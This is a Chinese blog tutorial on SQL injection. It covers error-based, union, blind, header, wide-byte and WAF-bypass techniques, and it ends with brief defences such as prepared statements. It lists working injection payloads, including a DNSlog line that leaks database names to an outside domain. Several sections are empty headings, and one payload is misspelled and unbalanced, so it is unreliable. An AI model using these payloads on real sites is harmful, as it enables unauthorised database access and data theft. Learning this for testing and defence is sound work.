sql注入

已于 2023-03-21 16:11:55 修改
阅读量585 收藏 4
点赞数 2
文章标签: sql 数据库 安全 Powered by 金山文档
于 2023-03-21 16:03:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54037445/article/details/129689899
版权

一、漏洞原理

Web应用程序对用户通过GET或POST提交的数据没有进行一个严格的控制和过滤,攻击者可以在web应用程序事先定义好的sql语句后面拼接一些恶意的SQL语句,从而实现欺骗数据库来执行一些未经授权的操作。

二、危害

  1. 绕过认证,获取非法权限;

  1. 获取数据库内容;

  1. 借助数据库存储过程进行提权;

  1. 利用数据库写入进行shell的获取;

三、一般流程

  1. 判断是否存在注入漏洞;

  1. 收集信息,判断数据库类型;

  1. 判断注入类型,重构查询语句;

  1. 猜解表名、字段名;

  1. 获取详细内容;

四、分类

  1. 报错注入

  1. 盲注

  1. 联合查询注入

  1. 宽字节注入

五、注入方法和绕过

一、报错注入

1、extractvalue报错注入

and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

2、updataxml报错注入

and updataxml(1,concat(0x7e,(select database()),1) --+

二、GET union注入

union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+

union select 1,group_concat(column_name) from information_schema.columns where table_name = 表名 --+

三、sql文件上传:into outfile

1、Windows系统

2、Linux系统

四、DNSlog注入

1、DNSLog手工注入

load_file()

只能针对windows系统,利用的是UNC路径;

我们生成域名,和url拼接起来,这样目标服务器进行dns解析时,我们刷新解析记录获取到要获取的信息

要用到的域名申请网站:

http://ceye.io

http://www.dnslog.cn/

payload:

and (select load_file(concat("//",(select database()),"申请的域名/要访问的文件"))) #

2、DNSLog自动注入

语法:

五、POST注入

1、union注入

2、报错注入

floor报错

3、盲注

(1)、时间盲注
(2)、布尔盲注
(3)DNSLog注入

六、报头注入

当页面看不到明显变换时,可以尝试报头注入;

如果语句为insert,一般使用报错注入

1、user-agent注入

(1)、uagent,即User-Agent,中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言浏览器插件等。内容就是浏览器及版本信息,电脑信息等。常见用途为限制打开软件,浏览器,以及上网行为管理等。

2、Referer注入

3、Cookie注入

七、SQL注入绕过

1、注释符被过滤的绕过

(1)、源代码

‘#’和‘--’被过滤掉

(2)、绕过

2、and 和 or 被过滤的绕过

(1)、源代码

(2)、绕过手法

进行URL编码

3、空格过滤

(1)、源代码

过滤掉了:and or 空格 注释符等

(2)、绕过手法

1、使用+代替空格
2、进行URL编码
3、使用报错注入,不用到空格

4、limit替换

5、逗号过滤使用join绕过

1、获取回显位置

?id=-1' union select 1,2,3 --+

相当于

?id=-1' union select * from (select 1)a join (select 2)b join (select 3)c --+

2、获取库名

?id=-1' union select * from (select 1)a join (select 2)b join (select database())c --+

3、获取表名

?id=-1' union select * from (select 1)a join (select group_concat(table_name) from information_schema.tables where table_schema = database())b join (select 3)c --+

4、获取列名

?id=-1' union select * from (select 1)a join (select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name='users')b join (select 3)c --+

5、获取用户数据

用户名和密码分别获取;

6、union 和 select 过滤绕过

(1)、大小写绕过
(2)、复写绕过
(3)、报错注入

八、宽字节注入(仅限当前数据库GBK编码)

1、函数addslashes()

在指定的预定义字符前添加反斜杠,使其称为字符,丧失功能性。使闭合符失效

2、GBK编码

%df%5c 使\失效

3、绕过

?id=1%df'

'闭合符效果生效。

九、waf绕过

1、安全狗4.0

(1)、注释

(2)、替换

2、安全狗3.5

超大数据包绕过

3、分块传输绕过(post提交)

https://github.com/ThestaRY7/SQLinjection

burpsuit插件。

六、SQL注入的防御与修复

正则匹配

正则表达式匹配特殊字符;匹配到后将特殊字符替换为空,或者拒绝执行SQL语句。

  1. PHP - preg_replace方法

  1. Java - Pattern类

  1. Go - Regexp包

  1. Python - re包

转码 - PHP

  1. mysqli_real_escape_string() 实体化转码;只在UTF-8的编码模式下是绝对安全的。

预编译

SQL预编译是软件开发中规避SQL注入的通用解决方案;

  1. PHP - 使用PDO连接数据库

  1. Java - PreparedStatement

star-R
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分块传输绕过WAF进行SQL注入1
08-03
分块传输编码(Chunked transfer encoding)是超文本传输协议(HTTP)中的一种数据传输机制,允许HTTP由应用服务器发送给客户端应用(
web安全之SQL注入绕过技术(四)
Longwaer
02-26 4724
学习掌握SQL注入绕过技术原理及使用方法,更好的用于日常的渗透测试中。
sql注入技术总结
黑战士的博客
04-13 734
如果对应的表,列名爆不出来,可以尝试用字符转16进制转化。
基本SQL注入分析
2301_77732591的博客
04-25 242
猜测目标指令内容常见闭合方式 ‘ “ ‘) “) ‘)) “)) 或者无闭合闭合方式的错误如!!!!!重要where id=1 and 1 ⇒ where (id=1) and 1 where id = 1 or 1 ⇒ where (id=1) or 1 where id=(1 and 1) 和where id=(1 or 1)⇒ where id =(1)试错1) \ 转义 2)观察报错信息(掐头去尾:把前后多余的单引号或者双引号去掉,有时两个单引号会特别像双引号 )验证错误。
User-Agent(用户代理)是什么
热门推荐
ccc369639963的博客
03-10 2万+
User-Agent(用户代理)是什么 User-Agent 即用户代理,简称“UA”,它是一个特殊字符串头。网站服务器通过识别 “UA”来确定用户所使用的操作系统版本、CPU 类型、浏览器版本等信息。而网站服务器则通过判断 UA 来给客户端发送不同的页面。 我们知道,网络爬虫使用程序代码来访问网站,而非人类亲自点击访问,因此爬虫程序也被称为“网络机器人”。绝大多数网站都具备一定的反爬能力,禁止网爬虫大量地访问网站,以免给网站服务器带来压力。本节即将要讲解的 User-Agent 就是反爬策略的第一步。 网
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
sql注入之报错注入
m0_59855041的博客
06-12 1186
(4)group_concat():GROUP_CONCAT(xxx):是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
分块传输绕过WAF进行SQL注入
weixin_43815032的博客
11-22 2068
0x00最近看到许多师父在玩分块传输,据说能绕过所有WAF? 抱着学习的心态,复现了一波,扩展了很多知识面。 ...
浅谈盲注中的基于时间型和布尔型的注入方法
weixin_45682070的博客
08-05 477
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一...
java 修改 referer_Java实现跳过网站Referer校验
weixin_27374911的博客
02-16 805
为了防止盗链,网站的某些页面阻止了来自于非本站的链接进入,为了规避这个问题,可以通过如下方式实现:1、在需要跳转的js中使用如下语句:var arg = '\u003cscript\u003elocation.replace("'+searchUrl+'")\u003c/script\u003e';window.open('javascript:window.name;', arg);经测试,上述...
(白帽子学习笔记)前渗透——SQL注入
冬的博客
08-23 764
注入详解 目录 注入详解 SQL注入 SQL注入漏洞的产生必须满足两个条件: SQL注入漏洞的危害 注入判断: SQL注入类型: 数字型: 字符型: 布尔盲注: 时间盲注: 报错注入: 联合注入: 堆查询注入: 宽字节注入: 按注入点类型 数字型 字符型 搜索型 按执行效果类型 布尔盲注 时间盲注 报错注入 宽字节注入 DNSlog外带 sqli-labs部分总结 第五关——基于'字符型报错 第六关——基于"字符型报错 第七关——文件读写注入 第八
SQL-labs练习记录(16~20)【post时间盲注,密码注入,UA注入,referer注入,cookie注入
bin789456的博客
08-22 458
post时间盲注,附带新脚本,从包入手,更改各项数据。
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了防止SQL注入攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这样可以将用户输入的数据作为参数传递给SQL查询,而不是将其直接拼接到查询语句中。这样可以防止恶意代码的注入。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保只接受符合预期格式的数据。例如,可以使用正则表达式验证输入是否符合特定的模式。 3. 最小权限原则:确保数据库用户只具有执行必要操作的最低权限。这样即使发生SQL注入攻击,攻击者也无法执行敏感操作。 4. 错误处理:不要向用户显示详细的错误信息,以防止攻击者获取有关数据库结构和配置的敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值